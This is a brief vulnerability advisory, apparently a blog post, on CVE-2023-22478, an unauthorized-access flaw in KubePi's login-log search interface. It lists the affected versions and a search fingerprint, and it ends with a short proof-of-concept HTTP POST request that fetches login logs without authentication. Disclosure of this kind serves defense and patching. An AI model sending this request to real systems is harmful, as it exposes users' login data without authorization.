Kubepi Loginlogssearch Unauthorized Access Vulnerability Cve 2023 22478
Kubepi Loginlogssearch Unauthorized Access Vulnerability Cve 2023 22478
KubePi LoginLogsSearch Unauthorized Access Vulnerability CVE-2023-22478
Vulnerability Description
The interface under the KubePi LoginLogsSearch method has an unauthorized access vulnerability. The attacker can obtain the user’s login log information without authorization, further breaking the user.
Vulnerability Impact
KubePi <= v1.6.4
Network surveying and mapping
“kubepi”
Vulnerability reappears
Login page
Authentication was added to the route in the patch
The corresponding interface is
Verify POC
1
2
3
4
POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1
Content-Type: application/json
{}
This post is licensed under CC BY 4.0 by the author.